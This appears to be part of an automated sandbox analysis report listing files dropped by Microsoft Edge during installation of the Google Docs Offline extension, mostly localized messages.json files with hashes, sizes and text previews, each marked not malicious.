                                                                                                                                                                                                                  SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                  MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                  SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                  SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                  SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):884
                                                                                                                                                                                                                  Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                  MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                  SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                  SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                  SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):980
                                                                                                                                                                                                                  Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                  MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                  SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                  SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                  SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wuser popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1941
                                                                                                                                                                                                                  Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                  MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                  SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                  SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                  SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1969
                                                                                                                                                                                                                  Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                  MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                  SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                  SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                  SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1674
                                                                                                                                                                                                                  Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                  MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                  SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                  SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                  SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1063
                                                                                                                                                                                                                  Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                  MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                  SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                  SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                  SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1333
                                                                                                                                                                                                                  Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                  MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                  SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                  SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                  SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1263
                                                                                                                                                                                                                  Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                  MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                  SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                  SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                  SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1074
                                                                                                                                                                                                                  Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                  MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                  SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                  SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                  SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):879
                                                                                                                                                                                                                  Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                  MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                  SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                  SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                  SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1205
                                                                                                                                                                                                                  Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                  MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                  SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                  SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                  SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):843
                                                                                                                                                                                                                  Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                  MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                  SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                  SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                  SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):912
                                                                                                                                                                                                                  Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                  MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                  SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                  SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                  SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11406
                                                                                                                                                                                                                  Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                  MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                  SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                  SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                  SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                  Malicious:false
